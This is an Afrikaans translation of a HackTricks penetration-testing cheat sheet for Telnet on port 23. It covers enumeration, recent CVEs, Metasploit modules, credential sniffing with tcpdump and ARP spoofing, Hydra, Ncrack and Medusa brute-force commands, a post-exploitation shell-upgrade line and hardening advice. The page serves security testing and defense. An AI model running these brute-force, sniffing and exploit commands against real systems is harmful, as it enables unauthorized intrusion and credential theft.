23 - Pentesting Telnet

Basiese Inligting

Telnet is 'n netwerkprotokol wat gebruikers 'n ONveilige manier bied om toegang tot 'n rekenaar oor 'n netwerk te verkry.

Standaard poort: 23

23/tcp open  telnet

Enumerasie

Banner Grabbing

nc -vn <IP> 23

Alle interessante enumerasie kan deur nmap uitgevoer word:

nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>

Die skrip telnet-ntlm-info.nse sal NTLM-inligting (Windows weergawes) verkry.

Van die telnet RFC: In die TELNET-protokol is daar verskeie "opsies" wat goedgekeur sal word en gebruik kan word met die "DO, DON'T, WILL, WON'T" struktuur om 'n gebruiker en bediener in staat te stel om saam te stem om 'n meer uitgebreide (of dalk net verskillende) stel konvensies vir hul TELNET-verbinding te gebruik. Sulke opsies kan insluit die verandering van die karakterstel, die echo-modus, ens.

Ek weet dit is moontlik om hierdie opsies te enumerate, maar ek weet nie hoe nie, so laat weet my as jy weet hoe.

Brute force

Konfigurasie-lêer

/etc/inetd.conf
/etc/xinetd.d/telnet
/etc/xinetd.d/stelnet

HackTricks Outomatiese Opdragte

Protocol_Name: Telnet    #Protocol Abbreviation if there is one.
Port_Number:  23     #Comma separated if there is more than one.
Protocol_Description: Telnet          #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for t=Telnet
Note: |
wireshark to hear creds being passed
tcp.port == 23 and ip.addr != myip

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-telnet.html

Entry_2:
Name: Banner Grab
Description: Grab Telnet Banner
Command: nc -vn {IP} 23

Entry_3:
Name: Nmap with scripts
Description: Run nmap scripts for telnet
Command: nmap -n -sV -Pn --script "*telnet*" -p 23 {IP}

Entry_4:
Name: consoleless mfs enumeration
Description: Telnet enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit'

Onlangse Kwetsbaarhede (2022-2025)

• CVE-2024-45698 – D-Link Wi-Fi 6 routers (DIR-X4860): Die ingeboude Telnet-diens het hard-gecodeerde akrediteerbesonderhede aanvaar en het gefaal om invoer te saniteer, wat ongeverifieerde afstandlike RCE as root via vervaardigde opdragte op poort 23 moontlik gemaak het. Reggestel in firmware ≥ 1.04B05.
• CVE-2023-40478 – NETGEAR RAX30: Stapel-gebaseerde buffer oorgeloop in die Telnet CLI passwd opdrag laat 'n aangrensende aanvaller toe om verifikasie te omseil en arbitrêre kode as root uit te voer.
• CVE-2022-39028 – GNU inetutils telnetd: 'n Twee-byte reeks (0xff 0xf7 / 0xff 0xf8) aktiveer 'n NULL-pointer dereferensie wat telnetd kan laat crash, wat lei tot 'n volgehoue DoS na verskeie crashes.

Hou hierdie CVE's in gedagte tydens kwesbaarheid triage—as die teiken 'n on-gepatchte firmware of erflating inetutils Telnet daemon draai, mag jy 'n regstreekse pad na kode-uitvoering of 'n ontwrigting DoS hê.

Snuffel Akrediteerbesonderhede & Man-in-the-Middle

Telnet stuur alles, insluitend akrediteerbesonderhede, in duidelike teks. Twee vinnige maniere om dit te vang:

# Live capture with tcpdump (print ASCII)
sudo tcpdump -i eth0 -A 'tcp port 23 and not src host $(hostname -I | cut -d" " -f1)'

# Wireshark display filter
tcp.port == 23 && (telnet.data || telnet.option)

Vir aktiewe MITM, kombineer ARP spoofing (bv. arpspoof/ettercap) met dieselfde snuffelfilters om wagwoorde op geswitched netwerke te versamel.

Geoutomatiseerde Brute-force / Wagwoord Spuit

# Hydra (stop at first valid login)
hydra -L users.txt -P rockyou.txt -t 4 -f telnet://<IP>

# Ncrack (drop to interactive session on success)
ncrack -p 23 --user admin -P common-pass.txt --connection-limit 4 <IP>

# Medusa (parallel hosts)
medusa -M telnet -h targets.txt -U users.txt -P passwords.txt -t 6 -f

Die meeste IoT-botnets (Mirai-variantes) skandeer steeds poort 23 met klein standaard-akkrediteringswoordeboeke—die spieël van daardie logika kan vinnig swak toestelle identifiseer.

Exploitatie & Post-Exploitatie

Metasploit het verskeie nuttige modules:

• auxiliary/scanner/telnet/telnet_version – banner & opsie enumerasie.
• auxiliary/scanner/telnet/brute_telnet – multithreaded bruteforce.
• auxiliary/scanner/telnet/telnet_encrypt_overflow – RCE teen kwesbare Solaris 9/10 Telnet (opsie ENCRYPT hantering).
• exploit/linux/mips/netgear_telnetenable – stel telnet-diens in met 'n vervaardigde pakket op baie NETGEAR-roeters.

Nadat 'n shell verkry is, onthou dat TTY's gewoonlik dom is; opgradeer met python -c 'import pty;pty.spawn("/bin/bash")' of gebruik die HackTricks TTY tricks.

Versterking & Ontdekking (Blou span hoek)

1. Verkies SSH en deaktiveer Telnet-diens heeltemal.
2. As Telnet vereis word, bind dit slegs aan bestuurs-VLAN's, handhaaf ACL's en verpak die daemon met TCP wrappers (/etc/hosts.allow).
3. Vervang erfenis telnetd implementasies met ssl-telnet of telnetd-ssl om vervoer-enkripsie by te voeg, maar dit beskerm slegs data-in-transit—wachtwoord-raai bly triviaal.
4. Monitor vir uitgaande verkeer na poort 23; kompromies genereer dikwels omgekeerde shells oor Telnet om streng HTTP-uitgangfilters te omseil.

Verwysings

• D-Link Advisory – CVE-2024-45698 Kritieke Telnet RCE.
• NVD – CVE-2022-39028 inetutils telnetd DoS.